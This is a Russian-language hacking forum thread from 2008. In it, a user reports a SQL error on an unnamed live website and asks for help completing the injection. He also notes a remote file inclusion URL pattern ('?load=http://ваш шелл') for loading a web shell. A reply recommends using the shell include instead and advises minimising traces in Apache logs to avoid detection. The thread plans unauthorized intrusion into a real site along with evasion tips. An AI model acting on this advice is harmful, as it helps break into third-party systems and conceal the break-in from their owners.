ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL или просто недоработки
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

SQL или просто недоработки
  #1  
Старый 22.12.2008, 12:53
Ilia_dozor
Познающий
Регистрация: 26.05.2007
Сообщений: 49
Провел на форуме:
187316

Репутация: 4
По умолчанию SQL или просто недоработки
Нашел этот сайт смотри тута потом сделал вот http://наш сайт.com/?show=item&item=%D1%8D&cur=' и видим

Query Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

видать,дело пахнет керосином...а вот если сделать http://этот сайт.com/?load=http://ваш шелл то вообще весело

помогите довести sql до конца
 
Ответить с цитированием

  #2  
Старый 22.12.2008, 13:00
TAKO
Banned
Регистрация: 17.12.2008
Сообщений: 9
Провел на форуме:
117291

Репутация: 3
По умолчанию
Обычная ошибка. Не уязвимость
 
Ответить с цитированием

  #3  
Старый 22.12.2008, 13:55
furang
Познающий
Регистрация: 07.04.2007
Сообщений: 88
Провел на форуме:
6406543

Репутация: 48
По умолчанию
если есть возможность заинклудить шелл, то зачем мудохатся с инъекцией?
А если так уж охота провести инъекцию, то я в твоем случае для начала сливаю сам скрипт в котором потенциальная бага, ищу есть ли там ошибка, и только потом организовую атаку. На апаче ведь логи ведутся, и чем меньше наследишь тем больше вероятность остаться незамеченным.

ЗЫ. Кстати даже если ты можешь влиять на запрос, то не всегда есть возможность напакостить. Порой стоят оч неплохе фильтры.
 
Ответить с цитированием

  #4  
Старый 22.12.2008, 18:00
Ilia_dozor
Познающий
Регистрация: 26.05.2007
Сообщений: 49
Провел на форуме:
187316

Репутация: 4
По умолчанию
ну как вам сказать-шелл не коннектится...нинай пачму
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
Хакер и закон! SladerNon Болталка 17 12.11.2009 09:42
SQL Injection в форумах Dracula4ever Статьи 13 05.09.2006 16:33
Bsod экран смерти silveran Чужие Статьи 1 21.12.2005 22:34



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ